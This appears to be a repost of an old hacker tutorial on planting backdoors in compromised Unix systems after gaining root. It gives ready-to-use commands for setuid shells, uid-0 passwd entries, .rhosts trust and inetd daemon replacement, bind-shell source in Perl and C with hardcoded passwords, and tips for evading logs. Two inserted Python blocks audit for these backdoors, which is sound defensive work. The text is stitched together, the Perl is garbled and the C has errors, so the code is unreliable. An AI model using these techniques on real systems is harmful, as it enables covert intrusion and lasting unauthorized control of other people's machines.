*nix: how to create a backdoor - vulnerability warning - the black bar safety net

ID MYHACK58:62200924298
Type myhack58
Reporter Anonymous
Modified 2009-08-15T00:00:00


Having painstakingly (or easily) obtained root, you naturally want to hold it long-term, so you can come back later and d0 what u want t0 d0 :) The traditional way is to build a back door (backd00r). Even if the intrusion is discovered, a better (advanced) back door still lets you break in again at your ease. Remember: "we come back and we are the h.a.c.k.e.r". The ways of creating a back door are as follows:

1. setuid

cp /bin/sh /tmp/.backdoor

chmod u+s /tmp/.backdoor

Adds the suid bit to a copy of the shell. The simplest and most convenient, but also the easiest for the admin to find with find / -perm 4000 -print; on most SunOS you will also find that the shell cannot be setuid. Suitable for novices.

2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd, i.e. add an account with uid 0 (root) and no password to the system. Also very easy to find. Suitable for novices.

3. echo "+ zer9" >> /.rhosts, so that a local user named zer9 can rlogin to the target without a password. Here zer9 is effectively the password: if you don't know it, you don't get in. The precondition is that port 512, 513 or 514 is open on the target. Note: echo "+ +" >> /.rhosts lets any user rlogin to the target, which leaves its door wide open, so best not. You can also echo "+ +" >> /etc/hosts.equiv, but that does not give root privileges. For those a little above novice and a little below intermediate.

4. Modify sendmail.cf to add a "wiz" command. Usage: telnet target 25 [enter], wiz [enter]. I learned this from SAFEsuite but have not tried it; it is the more dangerous one, because almost every scanner probes for this vulnerability, though you can give the command itself a name that is not easy to guess. More complex and dangerous, but not easy for the admin to find, and well hidden; only try it on your own machine. As the name suggests, a master-level hole.

5. Crack daemons such as inetd, login, ..., i.e. install your own trojaned versions. You need rootkits for the various unix versions and have to compile each of them; if the target is not running something like tripwire this can hardly be found. linux, sunos and freebsd may look fine, but the others? Even if you find one, do you have a compiler for that platform? I have a machine running slackware, one running irix, one running sunos, one running hpux, one running digital unix, ... hahhahha, I had that dream again. :) Personally I think this is the best method, but the implementation carries a certain risk: you have to consider what to do if your trojan fails, because the principle is that nothing we do may damage any data on the target machine.

6. ping rem0te backd00r. Even a firewall rarely stops ICMP from passing, so this backdoor can bypass the firewall. The actual program can be found on the [THC] homepage. I have also thought of a way to get through a firewall directly with the ping command: one host inside the firewall, one outside; everything other than ICMP is filtered by the firewall; use a 60k data length to stand for "long" and 10k for "short", i.e. Morse code, or any other custom encoding, and read the information off the ping data length with ICMPinfo: "dit, dit, dah, dah, dit, dit, dit..." "Yangtze, Yangtze, this is Yellow River, fire on me! Fire on me!" (^o^). After a while I will verify the feasibility with a program. (Technically there should be no difficulty.)

7. rem0te shell. My favourite way. Because it bypasses login, who cannot see you, that is, it avoids utmp, utmpx, wtmp and wtmpx; but it does not completely avoid syslogd: the admin can still find you in /var/log/messages. There is, however, a way to bypass syslogd completely; hear me out below, one point at a time. A bindshell can be done in two ways: a. replace an unimportant inetd.conf service such as rlogind :) so that when inetd accepts the connect request, a shell is spammed out directly on that port with system("/bin/csh -i"); b. accept the connect, then spam out a shell on a high port; more secure :) Below I give a perl implementation that needs no socket library (passed on sunos 5.5.1, slackware 2.0.33, irix 6.4 and hpux 10.2) and a gnu c implementation (tested on slackware 2.0.33 and irix 6.4).

Installation method for the perl version:
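As an added defensive check (not from the original article), the following Python audits a host for the three persistence signs described in items 1 to 3: an extra uid 0 or passwordless entry in /etc/passwd, "+" wildcards in /.rhosts or /etc/hosts.equiv, and setuid copies of a shell hidden under another name. The passwd and rhosts contents and the temporary files are constructed samples; on a live host, pass the real file contents and the real shells (e.g. /bin/sh, /bin/csh) instead.

```python
import hashlib, os, tempfile
# Constructed samples mirroring items 1 to 3 above (not real system files).
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/sh
zer9::0:0::/:/bin/csh
"""
RHOSTS_SAMPLE = """# trusted hosts
buildhost.example.test alice
+ zer9
"""

def suspicious_passwd_entries(passwd_text, allowed_root=("root",)):
    """(user, reason) pairs for extra uid-0 accounts and empty password fields."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7: continue  # blank or malformed line
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user not in allowed_root:
            findings.append((user, "extra uid 0 account"))
        if pw == "":
            findings.append((user, "empty password field"))
    return findings

def suspicious_trust_entries(rhosts_text):
    """.rhosts / hosts.equiv lines using the '+' wildcard for host or user."""
    return [ln.strip() for ln in rhosts_text.splitlines()
            if ln.split() and not ln.lstrip().startswith("#") and "+" in ln.split()]

def digest(path):
    with open(path, "rb") as f: return hashlib.sha256(f.read()).hexdigest()
def setuid_shell_copies(root, shell_paths):
    """Setuid files under root whose bytes equal a shell (a renamed copy is caught by content)."""
    shell_hashes = {digest(p) for p in shell_paths if os.path.isfile(p)}
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            setuid = os.lstat(path).st_mode & 0o4000  # 0o4000 is the setuid bit
            if setuid and os.path.isfile(path) and digest(path) in shell_hashes:
                hits.append(path)
    return hits

def demo_setuid_check():
    root = tempfile.mkdtemp()  # constructed tree: stand-in 'shell' plus a setuid copy
    shell, copy = os.path.join(root, "sh"), os.path.join(root, ".backdoor")
    for p in (shell, copy):
        with open(p, "wb") as f:
            f.write(b"#!/bin/true\n# stand-in for /bin/sh\n")
    os.chmod(copy, 0o4755)  # chmod u+s, as in item 1
    return [os.path.relpath(p, root) for p in setuid_shell_copies(root, [shell])]
```

The content-hash comparison is what matters: a setuid copy named /tmp/.backdoor is invisible to a name-based search but identical in bytes to the shell it was copied from.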

No need to compile!!!! As long as the target machine has perl support, it's fine!

How to tell whether there is perl: $/> perl [enter]

[ctrl-c] $/>

If you are not very familiar with the contents of /etc/inetd.conf, the following method carries a very big risk, please exit(-1). First cut out the source program and save it under the name of the daemon you want to replace, such as in.rexecd or in.rlogind, in.pop2d.... Best is one the admin has already turned off but which is not too conspicuous; note that it must be a TCP service. Then mv /usr/sbin/in.rexecd /usr/sbin/in.rexecd.bak :)) and cp in.rexecd /usr/sbin/in.rexecd. Then ps -aux | grep inetd; kill -HUP <pid of inetd>; okay! Not even /etc/inetd.conf needs changing. To reiterate one point: whatever the circumstances, we all want to protect the data as far as possible! Usage: nc target <port> (such as 512) [enter], ur passwd [enter] (then u login in... :)

---- Cut Here------------------------------------------
#!/usr/bin/perl
#
# rem0te bind shell
# [perl version only tcp]
#
# passed on almost all unix
# greets to van Hauser/[THC]
# for his daemonshell.pl
#
# d3f4ult p4sswd 1s "wh04r3u" (no quotes);

if ($PASSWORD) {
    chop($pass = );
    if (crypt($pass, $PASSWORD) ne $PASSWORD) { exit 0; }
    exec $SHELL;
    exit 0;
}
---- Cut Here--------------------------------------------

The following is the gnu c bindshell. First cut it out, save it as backdoor.c, then cc backdoor.c -o backdoor; the other steps are just l1ke before. Usage (example: bound to in.rlogind (513)): nc target 513 // spams a shell on the high port; then nc target 54321, ur passwd (then u coming in...)

---- Cut Here-------------------------------------
/*
 * [bind-shell]
 * by zer9[FTT]
 * zer9@21cn.com
 * test on slackware 2.0.33 & irix6.4 (cc)
 * cc backdoor.c -o backdoor
 * u c4n p01nt t0 wh1ch p0rt th3 sh3ll t0 sp4m
 * c0mm4nd l1n3: backdoor [port]
 * d3fault p0rt 1s: 54321
 * greets to b4b0 for his b4b0.c
 * m4yb3 1 c0uld s4y: "0k,b4b0. l1st3n c4r3fully;"
 * s0rry, just a joke.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PassWord "k1n90fth3w0rld"
/* u c4n us3 crypt l1b4ry t0 sh4d0w 1t */
#define DefaultPort 54321
/* d3f4ult b1nd1ng p0rt */

int main(int argc, char **argv)
{
    int s, in_s;
    struct sockaddr_in server, client;
    int client_len, bindport;
    char recvbuf[1000];

    if (argc != 2)
        bindport = DefaultPort;
    else
        bindport = atoi(argv[1]);
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return -1;
    }
    bzero((char *)&server, sizeof(server));
    bzero((char *)&client, sizeof(client));
    bzero(recvbuf, sizeof(recvbuf));
    server.sin_family = AF_INET;
    server.sin_port = htons(bindport);
    server.sin_addr.server_address = INADDR_ANY;
    if (bind(s, (struct sockaddr *)&server, sizeof(server)) < 0) {
        perror("bind");
        return -1;
    }
    if (listen(s, 3) != 0) {
        perror("listen");
        return -1;
    }
    client_len = sizeof(client);
    if ((in_s = accept(s, (struct sockaddr *)&client, &client_len)) < 0) {
        perror("accept");
        return -1;
    }
    recv(in_s, recvbuf, sizeof(recvbuf), 0);
    sleep(1);
    if ((strlen(recvbuf) - 1) == strlen(PassWord))
        if (!strncmp(recvbuf, PassWord, strlen(PassWord))) {
            send(in_s, "0k4y! c0m1ng 1n...\n", 25, 0);
            close(0); close(1); close(2);
            dup2(in_s, 0); dup2(in_s, 1); dup2(in_s, 2);
            execl("/bin/csh", "/bin/csh", (char *)0);
        }
    close(s);
    close(in_s);
    return 0;
}
---- Cut Here-------------------------------------------------

The above methods still cannot completely avoid syslogd, because they are started by inetd, and inetd logs when it starts them; bypass inetd and you avoid syslog completely! The method is very simple: just start program 2 (the c version) directly from the command line (the perl one cannot). But that is a lot of trouble: once the admin turns the machine off the game is over. A better method is to add "virus &" to /etc/rc.d/rc.local, but even then it has to be restarted every time; a still better approach is to write a fully functional daemon (with backdoor capabilities ^o^), which solves the problem completely. But is that as efficient and safe as hacking inetd?

8. The eighth weapon is crontab. I only know the principle and have not practised it. At a certain time, add a user with uid 0 (root) to /etc/passwd, and delete it again when the time is up, or create a suid shell... It is described in detail in the articles mentioned in the preamble.

9. Has anyone thought of it: send an email to a user of the system and the OS spams out a shell? The .forward file in the user's home directory can be used to get this far.

10. Modify the kernel: the super master approach. 2.2.0 unpacks to several tens of MB; just looking at it gives me a headache. Then jmp ffff0 :) (I did not look at the contents, only the size; [THC] recently had an article about this. If you have confidence in yourself, you can take a look.)

11. There is also the use of overflow programs. Although we generally use them to obtain root, as long as the admin has not patched and u are still there, we can always use them, and unlike a suid shell they are not afraid of being found by find / -perm 4000; generally only tripwire can find them.
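As an added defensive counterpart to item 7 and the rc.local discussion above (not from the original article): a bind shell started by hand or from rc.local leaves no inetd log line, but it does leave a listening socket that neither /etc/inetd.conf nor the allowlisted services explain. The inetd.conf fragment, /etc/services fragment and ss -Hltn style output below are constructed samples; on a live host feed in the real files and the real ss output. A daemon binary swapped under an existing inetd.conf entry (item 7a) keeps its expected port, so that case needs a file-integrity baseline such as tripwire instead.

```python
# Constructed samples (not from a real host): inetd.conf, /etc/services, `ss -Hltn`.
INETD_CONF_SAMPLE = """# service type   proto wait   user program              args
ftp     stream tcp   nowait root /usr/sbin/in.ftpd    in.ftpd
#exec   stream tcp   nowait root /usr/sbin/in.rexecd  in.rexecd
login   stream tcp   nowait root /usr/sbin/in.rlogind in.rlogind
talk    dgram  udp   wait   root /usr/sbin/in.talkd   in.talkd
"""
SERVICES_SAMPLE = """ftp     21/tcp
exec    512/tcp
login   513/tcp
shell   514/tcp  cmd
"""
SS_SAMPLE = """LISTEN 0 128 0.0.0.0:22    0.0.0.0:*
LISTEN 0 128 0.0.0.0:21    0.0.0.0:*
LISTEN 0 128 0.0.0.0:513   0.0.0.0:*
LISTEN 0 3   0.0.0.0:54321 0.0.0.0:*
LISTEN 0 128 [::]:22       [::]:*
"""

def tcp_service_ports(services_text):
    """name -> port for the tcp entries of an /etc/services style file."""
    ports = {}
    for line in services_text.splitlines():
        f = line.split()
        if len(f) >= 2 and f[1].endswith("/tcp"):
            ports[f[0]] = int(f[1].split("/")[0])
    return ports

def inetd_tcp_ports(conf_text, services_text):
    """Ports of the enabled (uncommented) tcp services in an inetd.conf."""
    names = tcp_service_ports(services_text)
    ports = set()
    for line in conf_text.splitlines():
        f = line.split()
        if len(f) >= 3 and not line.startswith("#") and f[2] == "tcp" and f[0] in names:
            ports.add(names[f[0]])
    return ports

def listening_ports(ss_text):
    """Local ports in LISTEN state from `ss -Hltn` output (IPv4 and IPv6 forms)."""
    ports = set()
    for line in ss_text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[0] == "LISTEN":
            ports.add(int(f[3].rsplit(":", 1)[1]))
    return ports

def unexplained_listeners(ss_text, conf_text, services_text, allowlist=frozenset({22})):
    """Listening ports that neither inetd.conf nor the allowlist accounts for."""
    known = inetd_tcp_ports(conf_text, services_text) | allowlist
    return sorted(listening_ports(ss_text) - known)
```

In the sample, port 513 is explained by the enabled login entry and 22 by the allowlist, while the backlog-3 listener on 54321 is exactly what the article's default-port bind shell looks like from the outside.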